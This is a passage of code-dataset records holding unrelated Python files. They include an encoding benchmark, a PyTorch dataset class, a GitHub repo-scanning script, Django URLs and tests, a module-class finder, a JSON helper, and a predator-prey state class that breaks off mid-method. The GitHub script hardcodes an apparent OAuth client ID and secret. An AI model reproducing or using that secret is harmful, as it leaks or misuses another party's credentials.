+{"seq_id":"427513813","text":"from __future__ import with_statement\r\nimport sys\r\nimport time\r\ndef test_encode_decode():\r\n shalom = '\\u05dd\\u05d5\\u05dc\\u05e9'\r\n text = shalom*1000000\r\n start = time.time()\r\n text_utf8 = text.encode('utf-8')\r\n text_utf16 = text.encode('utf-16')\r\n assert text_utf8.decode() == text\r\n assert text_utf16.decode('utf-16') == text\r\n end = time.time()-start\r\n print (end)\r\n return end\r\n\r\ntest = test_encode_decode\r\nif __name__== '__main__':\r\n times = [test() for i in range(10)]\r\n times.remove(max(times))\r\n times.remove(min(times))\r\n print('Average:', sum(times)/len(times))\r\n","sub_path":"note.md/4_素材文件和源代码/01-3.py","file_name":"01-3.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"135312588","text":"import torch\r\nfrom torchvision import datasets\r\nfrom torchvision import transforms\r\nimport yaml\r\n\r\nimport os\r\n\r\ndx = {}\r\n\r\n\r\nclass ImageFolderWithPaths(datasets.ImageFolder):\r\n \"\"\"Custom dataset that includes image file paths. Extends\r\n torchvision.datasets.ImageFolder\r\n \"\"\"\r\n # override the __getitem__ method. this is the method dataloader calls\r\n def __getitem__(self, index):\r\n \"\"\"\r\n Args:\r\n index (int): Index\r\n Returns:\r\n tuple: (sample, target) where target is class_index of the target class.\r\n \"\"\"\r\n path, target = self.samples[index]\r\n sample = self.loader(path)\r\n if self.transform is not None:\r\n sample = self.transform(sample)\r\n if self.target_transform is not None:\r\n target = self.target_transform(target)\r\n pro = getproprioception(self, index, path)\r\n if pro is not None:\r\n # print(path)\r\n # print(type(pro))\r\n tensorpro = torch.tensor(pro)\r\n # print(tensorpro)\r\n # print(type(tensorpro))\r\n # print(transforms.ToTensor())\r\n return sample, target, path, tensorpro\r\n\r\n\r\ndef getfilename(self, index, path, proprioception):\r\n # print(\"the index {}, and path{} \".format(index, path))\r\n # with open(\"./dataset/pro{}_{}.txt\".format(counter, \r\n # proprioseption.header.stamp.secs), 'r') as outputfile:\r\n # print(path)\r\n # maping the image with corresponding pro.\r\n # From: pathcopyfromboth_16-10-2018\\train\\baxter\\images\\image26106_2034.jpg\r\n # To :pathcopyfromboth_16-10-2018\\train\\baxter\\pro\\pro26106_2034.txt\r\n file = path.replace(\"images\", \"pro\")\r\n file = file.replace(\"image\", \"pro\")\r\n file = file.replace(\".jpg\", \".yaml\")\r\n ######\r\n # used for one file with all proproception elements are randomized\r\n \r\n #point to the file path\r\n #open the file\r\n #get the values of the key of file variable name\r\n #if \"train\" not in (self.root) and \"env\" in path:\r\n allprotakenfromonefileisactive = True\r\n if \"train\" not in (self.root) and \"env\" in path and allprotakenfromonefileisactive:\r\n # print(\"validation time\")\r\n # for validation only (val/env/pro/ not used)\r\n # take proprioception information from random file in /randomuncyned/allrandomwhichisuncynedpro.txt.\r\n global dx\r\n if len(dx) == 0:\r\n filespath = os.path.abspath(__package__)\r\n filespath = os.path.dirname(filespath)\r\n #randomproprioceptionfile = filespath + '/' + '20190415' + '/' + 'randomuncyned' + '/' + 'allrandomunsyncedprobasedonproofenvranges.txt'\r\n #randomproprioceptionfile = filespath + '/' + '20190416' + '/' + 'randomuncyned' + '/' + 'allrandomunsyncedprobasedonproofbaxterranges.txt'\r\n \r\n #randomproprioceptionfile = filespath + '/' + '20190429' + '/' + 'randomuncyned' + '/' + 'allrandomunsyncedprobasedonproofenvranges.txt'\r\n #randomproprioceptionfile = filespath + '/' + '20190429' + '/' + 'randomuncyned' + '/' + 'allrandomunsyncedprobasedonproofenvranges_of_training_data.txt'\r\n \r\n #randomproprioceptionfile = filespath + '/' + '20190514-case3' + '/' + 'envrange' + '/' + 'envproinformation_associatedwith_baxtervalpronames.txt'\r\n #randomproprioceptionfile = filespath + '/' + '20190514-case4' + '/' + 'baxterrange' + '/' + 'baxterproinformation_associatedwith_valenvpronames.txt'\r\n\r\n #randomproprioceptionfile = filespath + '/' + '20190521-case3' + '/' + 'envrange' + '/' + 'envproinformation_associatedwith_baxtervalpronames.txt'\r\n #randomproprioceptionfile = filespath + '/' + '20190521-case4' + '/' + 'baxterrange' + '/' + 'baxterproinformation_associatedwith_valenvpronames.txt'\r\n\r\n #randomproprioceptionfile = filespath + '/' + '20190611-case3' + '/' + 'envrange' + '/' + 'envproinformation_associatedwith_baxtervalpronames.yaml'\r\n #randomproprioceptionfile = filespath + '/' + '20190611-case4' + '/' + 'baxterrange' + '/' + 'baxterproinformation_associatedwith_valenvpronames.yaml'\r\n\r\n randomproprioceptionfile = filespath + '/' + '20190612-case3' + '/' + 'envrange' + '/' + 'envproinformation_associatedwith_baxtervalpronames.yaml'\r\n #randomproprioceptionfile = filespath + '/' + '20190612-case4' + '/' + 'baxterrange' + '/' + 'baxterproinformation_associatedwith_valenvpronames.yaml'\r\n with open(randomproprioceptionfile, 'r') as outputfile:\r\n try:\r\n x = outputfile.read()\r\n except outputfile.errors as exc:\r\n print(exc)\r\n dx = yaml.load(x)\r\n keyAsfilenameonly = os.path.basename(file)\r\n x = dx[keyAsfilenameonly] \r\n ######\r\n else:\r\n with open(file, 'r') as outputfile:\r\n try:\r\n x = outputfile.read()\r\n except outputfile.errors as exc:\r\n print(exc)\r\n # print(type(x))\r\n # print(\"Yaml load the txt file--------------------\")\r\n x = yaml.load(x)\r\n # print(x)\r\n # print(type(x))\r\n if proprioception == \"all\":\r\n return x\r\n else:\r\n return x[proprioception]\r\n \r\ndef getvelocity(self, index, path):\r\n velocity = getfilename(self, index, path, \"velocity\")\r\n return velocity\r\n \r\n\r\ndef geteffort(self, index, path):\r\n effort = getfilename(self, index, path, \"effort\")\r\n return effort\r\n\r\ndef getposition(self, index, path):\r\n position = getfilename(self, index, path, \"position\")\r\n return position\r\n\r\ndef getproprioception(self, index, path):\r\n proprioception = getfilename(self, index, path, \"all\")\r\n #proprioception = proprioception['velocity'] + proprioception['effort'] + proprioception['position'] # len=57\r\n proprioception = proprioception.velocity + proprioception.effort + proprioception.position\r\n return proprioception","sub_path":"customdataset.py","file_name":"customdataset.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"347824554","text":"from builtins import len, open\r\nfrom locale import str\r\nimport requests\r\nimport json\r\nimport pandas as pd\r\nimport time\r\n\r\nclient_id = '6ff8da2ae4d057a6d048' # you have to write your own id\r\nclient_secret = '3b6868e71ae5ef6d14a5d8114a3638e84bc22c7a' # you have to write your own secret\r\n\r\n\r\ndef dict_creator(user_name, repo_list):\r\n df1 = pd.DataFrame(\r\n columns=['Name of repository', 'url', 'Frontend', 'Backend', 'Front/Backend', 'Angular', 'React',\r\n 'Vue', 'Ruby', 'TypeScript', 'JavaScript', 'Java', 'PHP', 'Python', 'MongoDB', 'MySql',\r\n 'PostgreSql'])\r\n\r\n for each_repo in repo_list:\r\n dict1 = {'Name of repository': '', 'url': '', 'Frontend': '', 'Backend': '', 'Front/Backend': '', 'Angular': '',\r\n 'React': '', 'Vue': '', 'Ruby': '', 'TypeScript': '', 'JavaScript': '', 'Java': '', 'PHP': '',\r\n 'Python': '', 'MongoDB': '', 'MySql': '', 'PostgreSql': ''}\r\n try:\r\n link = 'https://raw.githubusercontent.com/' + user_name + '/' + each_repo['repo_name'] + \\\r\n '/master/package.json?client_id=' + client_id + '&client_secret=' + client_secret\r\n page = requests.get(link)\r\n\r\n if page.status_code != 404:\r\n file_content = page.json()\r\n if \"@angular/common\" in file_content['dependencies']:\r\n dict1['TypeScript'] = 'X'\r\n dict1['Angular'] = 'X'\r\n elif \"react\" in file_content['dependencies']:\r\n dict1['JavaScript'] = 'X'\r\n dict1['React'] = 'X'\r\n else:\r\n continue\r\n if dict1:\r\n dict1['Frontend'] = 'X'\r\n dict1['Name of repository'] = each_repo['repo_name']\r\n dict1['url'] = 'https://api.github.com/repos/' + user_name + '/' + each_repo['repo_name']\r\n series = pd.Series(dict1)\r\n series.to_frame()\r\n df1 = df1.append(series, ignore_index=True)\r\n\r\n\r\n except:\r\n continue\r\n return df1\r\n\r\n\r\ndata = pd.DataFrame(\r\n columns=['Name of repository', 'url', 'Frontend', 'Backend', 'Front/Backend', 'Angular', 'React',\r\n 'Vue', 'Ruby', 'TypeScript', 'JavaScript', 'Java', 'PHP', 'Python', 'MongoDB', 'MySql',\r\n 'PostgreSql'])\r\n\r\ndf = pd.DataFrame({'Name of repository': [], 'url': [], 'Frontend': [], 'Backend': [], 'Front/Backend': [],\r\n 'Angular': [], 'React': [], 'Vue': [], 'Ruby': [], 'TypeScript': [], 'JavaScript': [], 'Java': [],\r\n 'PHP': [], 'Python': [], 'MongoDB': [], 'MySql': [], 'PostgreSql': []})\r\n\r\nwith open('Json files/Separated repos((2017-01-01)---(2017-06-30).json') as json_file:\r\n users = json.load(json_file)\r\n\r\ncount = 0\r\n\r\nfor each_user in users:\r\n if len(each_user['front_list']) > 0:\r\n df = df.append(dict_creator(each_user['user_name'], each_user['front_list']))\r\n count += len(each_user['front_list'])\r\n print('Project of user ' + each_user['user_name'] + ' are ready. Added project count: ' + str(count))\r\n\r\n\r\nwriter = pd.ExcelWriter('data3.xlsx', engine='xlsxwriter')\r\ndf.to_excel(writer, 'Sheet1')\r\nwriter.save()\r\n\r\n","sub_path":"Github Repo Finder/Data_creater.py","file_name":"Data_creater.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"274593723","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.overview, name = \"overview\" ),\n path(\"task-list/\",views.tasklist, name=\"tasklist\"),\n path(\"task-detail//\",views.taskdetail, name=\"taskdetail\"),\n path(\"task-create/\",views.taskcreate,name= \"taskcreate\"),\n path(\"task-update/\",views.taskupdate,name= \"taskupdate\"),\n path(\"task-delete/\",views.taskdelete,name=\"taskdelete\")\n]\n","sub_path":"todo_rest/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"643583599","text":"#\n# Copyright 2017 Nokia Solutions and Networks\n# Licensed under the Apache License, Version 2.0,\n# see license.txt file for details.\n#\n\n\ndef get_classes_from_module(module_location):\n import os\n from robot import pythonpathsetter\n import importlib\n import pkgutil\n\n module_directory = os.path.dirname(module_location)\n module_name = _find_module_name_by_path(module_location)\n class_names = list()\n\n if module_location.endswith('__init__.py'):\n pythonpathsetter.add_path(os.path.dirname(module_directory))\n module = importlib.import_module(module_name)\n class_names.extend(_find_names_in_module(module, module_name))\n for loader, name, _ in pkgutil.walk_packages([module_directory]):\n try:\n module = loader.find_module(name).load_module(name)\n class_names.extend(_find_names_in_module(module, name))\n except:\n pass # some modules can't be loaded separately\n class_names = [n if n.startswith(module_name) else module_name + \".\" + n for n in class_names]\n\n elif module_location.endswith('.py'):\n pythonpathsetter.add_path(module_directory)\n module = importlib.import_module(module_name)\n class_names.extend(_find_names_in_module(module, module_name))\n\n elif module_location.endswith(\".zip\") or module_location.endswith(\".jar\"):\n pythonpathsetter.add_path(module_location)\n for loader, name, _ in pkgutil.walk_packages([module_location]):\n try:\n module = loader.find_module(name).load_module(name)\n class_names.extend(_find_names_in_archive_module(module, name))\n except:\n pass # some modules can't be loaded separately\n\n else:\n raise Exception('Unrecognized library path: ' + module_location)\n\n return sorted(set(class_names))\n\n\ndef _find_module_path(start_path):\n import os\n\n current_path = os.path.abspath(start_path)\n while True:\n if os.path.isfile(current_path):\n current_path = os.path.dirname(current_path)\n elif os.path.isdir(current_path):\n import sys\n if os.path.exists(current_path + os.sep + '__init__.py') or os.path.basename(current_path) in sys.modules:\n current_path = os.path.normpath(os.path.join(current_path, os.path.pardir))\n else:\n return current_path\n else:\n break\n\n return os.path.abspath(start_path.split(os.sep)[0])\n\n\ndef _find_module_name_by_path(start_path):\n import os\n\n result = start_path\n path_to_module = _find_module_path(start_path)\n if path_to_module != start_path:\n path_to_replace = path_to_module + os.sep\n if path_to_module.endswith(os.sep):\n path_to_replace = path_to_module\n path_to_module = start_path.replace(path_to_replace, '', 1)\n result = path_to_module.replace(os.sep, '.')\n if os.path.isfile(start_path):\n if start_path.endswith('__init__.py'):\n result = result[:-12]\n else:\n _, start_path_extension = os.path.splitext(start_path)\n result = result[:-len(start_path_extension)]\n\n return result\n\n\ndef _find_names_in_module(module, name):\n import inspect\n\n result = list()\n result.append(module.__name__)\n for _, obj in inspect.getmembers(module):\n if inspect.isclass(obj) and obj.__module__.startswith(name):\n result.append(obj.__module__ + \".\" + obj.__name__)\n\n return result\n\n\ndef _find_names_in_archive_module(module, name):\n import inspect\n\n result = list()\n for n, obj in inspect.getmembers(module):\n if inspect.isfunction(obj):\n result.append(obj.__module__)\n if inspect.isclass(obj) and obj.__module__.startswith(name):\n if obj.__module__ != obj.__name__:\n result.append(obj.__module__ + \".\" + obj.__name__)\n else:\n result.append(obj.__module__)\n\n return result\n\n\nif __name__ == '__main__':\n import sys\n import json\n\n module_location = sys.argv[1]\n\n if len(sys.argv) > 2:\n sys.path.extend(sys.argv[2].split(';'))\n\n print(json.dumps(get_classes_from_module(module_location)))\n","sub_path":"src/RobotFrameworkCore/org.robotframework.ide.core-functions/src/main/python/scripts/red_module_classes.py","file_name":"red_module_classes.py","file_ext":"py","file_size_in_byte":4269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"158616849","text":"import json\nimport jq\nimport jsonpointer\nimport jsonpath_rw\nimport copy\nimport base64\nimport importlib\nfrom six import string_types\nimport logging\n\nlog = logging.getLogger(__name__)\n\n\nclass LeafModel(object):\n def __init__(self, spec):\n self.datamodel = spec or {\"keyword\": None, \"types\": {}}\n self._types2str, self._str2types = {}, {}\n for name, class_def in list(self.datamodel[\"types\"].items()):\n if type(class_def) == type:\n self._types2str[class_def] = name\n self._str2types[name] = class_def\n elif isinstance(class_def, string_types):\n m, c = class_def.split(\":\")\n c = getattr(importlib.import_module(m), c)\n self._types2str[c] = name\n self._str2types[name] = c\n else:\n raise RuntimeError(\"not sure how to interpret type def %s\", class_def)\n self.keyword = self.datamodel[\"keyword\"]\n self.canonical_leaf_magic = \"b64json://\"\n lits = self.datamodel.get(\"literals\")\n\n self.magics = [self.canonical_leaf_magic]\n\n if lits:\n m, f = lits[\"parser\"].split(\":\")\n self.litparser = getattr(importlib.import_module(m), f)\n self.magics += lits[\"magics\"]\n\n def leaf_encode(self, obj):\n return self.canonical_leaf_magic + base64.b64encode(\n json.dumps(self.dumper(obj)).encode(\"utf-8\")\n ).decode(\"utf-8\")\n\n def leaf_decode(self, encoded):\n for m in self.magics:\n if encoded.startswith(m):\n if m == self.canonical_leaf_magic:\n magic_replaced = encoded.replace(self.canonical_leaf_magic, \"\")\n return json.loads(base64.b64decode(magic_replaced).decode(\"utf-8\"))\n else:\n return self.litparser(encoded)\n raise RuntimeError(\"cannot decode {} \".format(encoded))\n\n def loader(self, spec, idleafs):\n if not self.keyword:\n return spec\n\n found_identifiers = set([self.keyword]).intersection(set(spec.keys()))\n found_identifiers = {k: spec[k] for k in found_identifiers}\n if not found_identifiers:\n return spec\n\n for k in list(found_identifiers.keys()):\n spec.pop(k)\n cl = self._str2types[found_identifiers[self.keyword]]\n obj = cl.fromJSON(spec)\n if not idleafs:\n return obj\n return self.leaf_encode(obj)\n\n def dumper(self, obj):\n json = obj.json()\n if not type(obj) == TypedLeafs:\n try:\n json[self.keyword] = self._types2str[type(obj)]\n except KeyError:\n log.exception(\"could not find type in %s\", self._types2str)\n raise\n return json\n\n\nclass TypedLeafs(object):\n def __init__(self, data, leafmodel=None, idleafs=False):\n self.leafmodel = leafmodel\n self._leafmodel = LeafModel(leafmodel)\n\n if isinstance(data, TypedLeafs):\n data = data.json()\n self._jsonable = data\n\n def __repr__(self):\n return \"\".format(self.typed())\n\n def __getitem__(self, key):\n return self.typed().__getitem__(key)\n\n def __iter__(self):\n return self.typed().__iter__()\n\n def __len__(self):\n return self.typed().__len__()\n\n def __delitem__(self, key):\n self._jsonable.__delitem__(key)\n\n def __setitem__(self, key, value):\n data = self._jsonable\n data.__setitem__(key, value)\n self._jsonable = data\n\n def __normalize(self, idleafs=True):\n # wrap in a simple dict, necessary for if data is just a leaf value\n data = {\n \"data\": self._load_from_string(\n self._dump_to_string(self._jsonable), typed=False\n )\n }\n if idleafs:\n magicexpr = \" or \".join(\n ['startswith(\"{}\")'.format(m) for m in self._leafmodel.magics]\n )\n ptrs = [\n jsonpointer.JsonPointer.from_parts(x)\n for x in jq.jq(\n 'paths(type==\"string\" and ({}))'.format(magicexpr)\n ).transform(data, multiple_output=True)\n ]\n for p in ptrs:\n p.set(data, self._leafmodel.leaf_decode(p.get(data)))\n self.__jsonable = data[\"data\"]\n\n @property\n def _jsonable(self):\n return self.__jsonable\n\n @_jsonable.setter\n def _jsonable(self, value):\n pass\n self.__jsonable = value\n self.__normalize()\n\n @classmethod\n def fromJSON(cls, data, deserialization_opts):\n return cls(\n data,\n deserialization_opts.get(\"leafmodel\", None),\n deserialization_opts.get(\"idleafs\", False),\n )\n\n def _load_from_string(self, jsonstring, typed=True, idleafs=False):\n if typed:\n data = json.loads(\n jsonstring,\n object_hook=lambda spec: self._leafmodel.loader(spec, idleafs),\n )\n return data\n else:\n return json.loads(jsonstring)\n\n def _dump_to_string(self, data):\n return json.dumps(data, default=self._leafmodel.dumper)\n\n def replace(self, path, value):\n self._jsonable = TypedLeafs(\n path.set(self.json(), value, inplace=False), self.leafmodel\n ).json()\n\n ### representation methods\n def json(self):\n return self._jsonable\n\n def typed(self, idleafs=False):\n return self._load_from_string(\n json.dumps(self._jsonable, sort_keys=True), typed=True, idleafs=idleafs\n )\n\n def copy(self):\n return TypedLeafs(copy.deepcopy(self.typed()), self.leafmodel)\n\n def asrefs(self, callback=None):\n data = self.copy().json()\n for p, v in self.leafs():\n if p.path == \"\":\n return p if not callback else callback(p)\n p.set(data, p if not callback else callback(p))\n return data\n\n ### QUERY methods\n def resolve_ref(self, reference):\n return reference.get(self.typed())\n\n def jsonpointer(self, pointer_str):\n return jsonpointer.JsonPointer(pointer_str).resolve(self.typed())\n\n def jsonpath(self, jsonpath_expression, multiple_output=False):\n if not multiple_output:\n return jsonpath_rw.parse(jsonpath_expression).find(self.typed())[0].value\n else:\n return [\n x.value\n for x in jsonpath_rw.parse(jsonpath_expression).find(self.typed())\n ]\n\n def jq(self, jq_program, *args, **kwargs):\n return TypedLeafs(\n jq.jq(jq_program).transform(self.typed(idleafs=True), *args, **kwargs),\n self.leafmodel,\n idleafs=True,\n )\n\n def leafs(self):\n if not isinstance(self.typed(), (list, dict)):\n yield jsonpointer.JsonPointer(\"\"), self.typed()\n else:\n ptrs = [\n jsonpointer.JsonPointer.from_parts(parts)\n for parts in self.jq(\"leaf_paths\", multiple_output=True).typed()\n ]\n for p in ptrs:\n yield p, p.get(self.typed())\n","sub_path":"packtivity/typedleafs.py","file_name":"typedleafs.py","file_ext":"py","file_size_in_byte":7177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"366037657","text":"# -*- coding: utf-8 -*-\nfrom collections import defaultdict\nfrom ordereddict import OrderedDict\nfrom zeit.cms.repository.folder import Folder\nfrom zeit.content.article.testing import create_article\nfrom zeit.content.volume.browser.toc import Toc, Excluder\nfrom zeit.content.volume.volume import Volume\nimport lxml.etree\nimport mock\nimport sys\nimport zeit.cms.content.add\nimport zeit.cms.content.sources\nimport zeit.cms.testing\nimport zeit.content.volume.interfaces\nimport zeit.content.volume.testing\nimport zope.component\n\n\nclass TocFunctionalTest(zeit.content.volume.testing.FunctionalTestCase):\n\n def setUp(self):\n super(TocFunctionalTest, self).setUp()\n self.toc_data = OrderedDict()\n self.toc_data['Die Zeit'] = OrderedDict(\n {'Politik': [{'page': '1',\n 'title': 'title',\n 'teaser': 'tease',\n 'access': u'frei verfügbar',\n 'supertitle': 'Super'}]\n }\n )\n self.toc_data['Anderer'] = OrderedDict(\n {'Dossier': [\n {'page': '1',\n 'access': u'frei verfügbar',\n 'title': 'title',\n 'teaser': 'tease',\n 'supertitle': 'Super'\n },\n {'page': '3',\n 'access': u'frei verfügbar',\n 'title': 'title2',\n 'teaser': 'tease',\n 'supertitle': 'Super'}\n ]}\n )\n self.article_xml_template = u\"\"\"\n \n \n {page}\n free\n \n \n Titel\n Das soll der Teaser\n sein\n \n \n \"\"\"\n\n def test_list_relevant_ressort_folders_excludes_leserbriefe_and_images(\n self):\n toc = Toc(mock.Mock(), mock.Mock())\n toc_connector = zope.component.getUtility(\n zeit.content.volume.interfaces.ITocConnector)\n self.zca.patch_utility(toc_connector,\n zeit.connector.interfaces.IConnector)\n folders = ['images', 'leserbriefe', 'politik']\n with zeit.cms.testing.site(self.getRootFolder()):\n self.repository['ZEI'] = Folder()\n self.repository['ZEI']['2015'] = Folder()\n self.repository['ZEI']['2015']['01'] = Folder()\n for foldername in folders:\n self.repository['ZEI']['2015']['01'][foldername] = Folder()\n relevant_ressorts = toc.list_relevant_ressort_folders(\n 'http://xml.zeit.de'\n '/ZEI/2015/01')\n foldernames = [folder.__name__ for folder in relevant_ressorts]\n self.assertIn('politik', foldernames)\n self.zca.reset()\n\n def test_create_toc_element_should_flatten_linebreaks(self):\n article_xml = self.article_xml_template.format(page='20-20')\n expected = {'page': 20,\n 'title': 'Titel',\n 'teaser': 'Das soll der Teaser sein',\n 'supertitle': '',\n 'access': u'frei verfügbar'\n }\n article_element = lxml.etree.fromstring(article_xml)\n toc = Toc(mock.Mock(), mock.Mock())\n result = toc._create_toc_element(article_element)\n self.assertEqual(expected, result)\n\n def test_csv_is_created_from_toc_data(self):\n expected = \"\"\"Die Zeit\\r\n\\tPolitik\\r\n1\\tSuper title tease\\t\\t\\t\\tfrei verfügbar\\r\nAnderer\\r\n\\tDossier\\r\n1\\tSuper title tease\\t\\t\\t\\tfrei verfügbar\\r\n3\\tSuper title2 tease\\t\\t\\t\\tfrei verfügbar\\r\n\"\"\"\n toc = Toc(mock.Mock(), mock.Mock())\n res = toc._create_csv(self.toc_data)\n self.assertEqual(expected, res)\n\n def test_empty_page_node_in_xml_results_in_max_int_page_in_toc_entry(self):\n article_xml = self.article_xml_template.format(page='')\n article_element = lxml.etree.fromstring(article_xml)\n t = Toc(mock.Mock(), mock.Mock())\n entry = t._create_toc_element(article_element)\n assert sys.maxint == entry.get('page')\n\n def test_product_id_mapping_has_full_name_for_zei_product_id(self):\n mapping = zeit.content.volume.interfaces.PRODUCT_MAPPING\n self.assertEqual('Die Zeit'.lower(), mapping.get('ZEI', '').lower())\n\n def test_sorts_entries_with_max_int_page_as_last_toc_element(self):\n toc_data = {\n 'Die Zeit': {\n 'Politik':\n [\n {'page': sys.maxint, 'title': 'title2'},\n {'page': 1, 'title': 'title1'}\n ]\n }\n }\n toc_data = OrderedDict(toc_data)\n t = Toc(mock.Mock(), mock.Mock())\n result = t._sort_toc_data(toc_data)\n assert sys.maxint == result.get('Die Zeit').get('Politik')[-1].get(\n 'page')\n\n def test_article_excluder_excludes_blacklisted_property_values(self):\n excluder = Excluder()\n xml_template = u\"\"\"\n \n \n {d[jobname]}\n \n \n {d[title]}\n {d[supertitle]}\n \n \n \"\"\"\n for values in [{'title': u'Heute 20.02.2016'},\n {'supertitle': u'WIR RATEN AB'},\n {'jobname': u'AS-Zahl'}]:\n xml = xml_template.format(d=defaultdict(str, **values))\n self.assertEqual(False,\n excluder.is_relevant(lxml.etree.fromstring(xml)))\n\n def test_init_toc_connector_is_registered_as_connector(self):\n old_connector = zope.component.getUtility(\n zeit.connector.interfaces.IConnector)\n # register_archive_connector is called in __init__\n # check for the correct side effects\n t = Toc(mock.Mock(), mock.Mock())\n new_connector = zope.component.getUtility(\n zeit.connector.interfaces.IConnector)\n # Check if a new IConnector was registered\n assert old_connector is not new_connector\n # Check if the toc.connector is the ITocConnector\n assert t.connector is zope.component.getUtility(\n zeit.content.volume.interfaces.ITocConnector)\n assert t.connector is zope.component.getUtility(\n zeit.connector.interfaces.IConnector)\n\n\nclass TocBrowserTest(zeit.cms.testing.BrowserTestCase):\n layer = zeit.content.volume.testing.ZCML_LAYER\n\n def setUp(self):\n super(TocBrowserTest, self).setUp()\n # Create the volume object with the mock IConnector\n volume = Volume()\n volume.year = 2015\n volume.volume = 1\n volume.product = zeit.cms.content.sources.Product(u'ZEI')\n self.article_title = 'Ein Test Titel'\n self.ressort_names = ['dossier', 'politik']\n self.article_page = 1\n zeit.cms.content.add.find_or_create_folder('2015', '01')\n self.repository['2015']['01']['ausgabe'] = volume\n # Now use the mock ITocConnector to mock the archive folders and the\n # article\n toc_connector = zope.component.getUtility(\n zeit.content.volume.interfaces.ITocConnector)\n self.zca.patch_utility(toc_connector,\n zeit.connector.interfaces.IConnector)\n with zeit.cms.testing.site(self.getRootFolder()):\n for ressort_name in self.ressort_names:\n zeit.cms.content.add.find_or_create_folder('ZEI', '2015',\n '01', ressort_name)\n with zeit.cms.testing.interaction():\n article = create_article()\n article.year = 2015\n article.volume = 1\n article.title = self.article_title\n article.page = self.article_page\n self.repository['ZEI']['2015']['01']['politik'][\n 'test_artikel'] = article\n self.zca.reset()\n\n def test_toc_view_is_csv_file_download(self):\n b = self.browser\n with mock.patch('zeit.content.volume.browser'\n '.toc.Toc._create_toc_content') as create_content:\n create_content.return_value = 'some csv'\n b.open('http://localhost/++skin++vivi/repository/'\n '2015/01/ausgabe/@@toc.csv')\n self.assertEqual('text/csv', b.headers['content-type'])\n self.assertEqual('attachment; '\n 'filename=\"table_of_content_2015_01.csv\"',\n b.headers['content-disposition'])\n self.assertEllipsis(\"some csv\", b.contents)\n\n def test_toc_generates_csv(self):\n b = self.browser\n b.open('http://localhost/++skin++vivi/repository/'\n '2015/01/ausgabe/@@toc.csv')\n self.assertIn(self.article_title, b.contents)\n self.assertIn(str(self.article_page), b.contents)\n for ressort_name in self.ressort_names:\n self.assertIn(ressort_name.title(), b.contents)\n self.assertIn('DIE ZEIT'.lower(), b.contents.lower())\n","sub_path":"src/zeit/content/volume/browser/tests/test_toc.py","file_name":"test_toc.py","file_ext":"py","file_size_in_byte":9562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"234817247","text":"# -*- coding: utf-8 -*-\nfrom copy import deepcopy\n\nclass State:\n original = []\n agents = []\n uid = ''\n transformation = None\n vof = None\n rows = 15\n cols = 15\n collision = False # Used for determining the move of the other predator\n \n def __init__(self, agents = [], vof = 15):\n self.vof = vof;\n self.original = deepcopy(agents)\n self.agents = agents\n #self.transformation = self.normalize()\n #self.reduce()\n self.getUniqueId()\n \n\n def getUniqueId(self):\n \n # compare all the preds and all preys\n if self.uid != '':\n return self.uid\n \n self.agents.sort()\n \n for agent in self.agents:\n x = int(agent['x'])\n y = int(agent['y'])\n\n self.uid = self.uid + '(' + str(x) + ',' + str(y) + ') '\n\n return self.uid\n \n def comp(self, state):\n if self.uniqueId == state.uniqueId: \n return True\n else: \n return False\n \n def normalize( self ):\n\n agents = self.agents\n\n # Initialize a fake prey for the case when no prey is present\n firstPrey = {'obj': 'prey', 'x': 0, 'y': 0}\n\t\t\n for a in agents:\n if a['obj'] == 'prey':\n firstPrey = a\n break\n\t\t\t\n # Lets flip diagonally (swap x and y) if necessary\n flipD = abs(firstPrey['y']) < abs(firstPrey['x'])\n if firstPrey['y'] == firstPrey['x']:\n for a in agents:\n if a['y'] < a['x']:\n flipD = True\n break;\n if a['y'] > a['x']:\n flipD = False\n break;\n\n if flipD:\n for a in agents:\n x = a['x']\n a['x'] = a['y']\n a['y'] = x\n \n # Lets flip horizontally (invert x) if necessary\n flipH = firstPrey['x'] < 0\n if firstPrey['x'] == 0:\n for a in agents:\n if a['x'] < 0:\n flipH = True\n break;\n if a['x'] > 0:\n flipH = False\n break;\n\n if flipH:\n for a in agents:\n a['x'] = - a['x']\n\n # Lets flip vertically (invert y) if necessary\n flipV = firstPrey['y'] < 0\n if firstPrey['y'] == 0:\n for a in agents:\n if a['y'] < 0:\n flipV = True\n break;\n if a['y'] > 0:\n flipV = False\n break;\n\n if flipV:\n for a in agents:\n a['y'] = - a['y']\n\n return [flipD, flipH, flipV]\n\n\n def transformState( self ):\n\n agents = self.agents\n\n [flipD, flipH, flipV] = self.transformation;\n\n # Lets flip vertically (invert y) if necessary\n if flipV:\n for a in agents:\n a['y'] = - a['y']\n\n # Lets flip horizontally (invert x) if necessary\n if flipH:\n for a in agents:\n a['x'] = - a['x']\n\n # Lets flip diagonally (swap x and y) if necessary\n if flipD:\n for a in agents:\n x = a['x']\n a['x'] = a['y']\n a['y'] = x\n\n def transformAction( self, action ):\n\n [flipD, flipH, flipV] = self.transformation;\n\n # Lets flip vertically (invert y) if necessary\n if flipV:\n if action == 0:\n action = 2\n elif action == 2:\n action = 0\n\n # Lets flip horizontally (invert x) if necessary\n if flipH:\n if action == 1:\n action = 3\n elif action == 3:\n action = 1\n\n # Lets flip diagonally (swap x and y) if necessary\n if flipD:\n if action == 0:\n action = 1\n elif action == 1:\n action = 0\n elif action == 2:\n action = 3\n elif action == 3:\n action = 2\n\n def reduce( self ):\n for a in self.agents:\n x = a['x']\n y = a['y']\n d = abs(x) + abs(y)\n if d > self.vof:\n x = int(round(float(x) / d * self.vof))\n y = int(round(float(y) / d * self.vof))\n # print 'Reduce: |%d,%d| = %d --> |%d,%d| = %d' % (a['x'], a['y'], d, x, y, abs(x)+abs(y))\n a['x'] = x\n a['y'] = y\n\n def determineAction( self, prev, action, i ):\n 